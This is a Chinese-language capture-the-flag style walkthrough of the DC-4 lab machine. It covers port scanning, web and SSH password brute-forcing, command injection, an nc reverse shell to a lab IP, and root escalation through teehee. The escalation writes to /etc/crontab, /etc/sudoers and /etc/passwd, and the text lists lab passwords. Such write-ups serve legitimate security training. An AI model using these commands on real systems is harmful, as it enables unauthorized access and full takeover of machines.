DC 4
DC-4
nmap 扫描端口
浏览器访问一下,一个登陆界面,admin作为用户名 password爆破一下
登上以后
命令执行!?
抓包改一下,发现可以执行其他命令
nc 反弹个shell(我第一时间想到的是 echo 写个 shell 进去,大佬的是 nc 直接用)
nc -e /bin/sh 192.168.149.141 6666
还是用 python 生成一个好点的交互
在 jim 目录下面发现一个 backups 里面有 old-password
尝试爆破登录 ssh?哦吼,中奖
参数解释:
-l jim 指定爆破账号为 jim
-w 10 指定每个线程的回应时间为 10S
-P pwd.txt 指定密码字典为 pwd.txt
-t 10 指定爆破线程为 10 个
-v 指定显示爆破过程
-f 查找到第一个可以使用的账号和密码的时候停止破解
ssh jim@192.168.149.160
密码:jibril04
在 /var/mail 目录下查看邮件信息
得到 charles 的密码:^xHhA&hvim0y,su 切换一下
sudo -l 看一下,发现 teehee 不需要密码就可以 root 权限运行
用来将标准输入复制到文件,也复制到标准输出
使用 teehee /etc/crontab 编辑一下
输入:* * * * * root chmod 4777 /bin/sh
再执行:ls -al /bin/dash,然后 /bin/sh 就可以了
另两种方法
1、
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
sudo su root,然后输入 charles 的密码
2、
如果能写在 passwd 里面一个 /bin/sh 的,跟 root 一样的话就可以
echo "yichen::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
su yichen
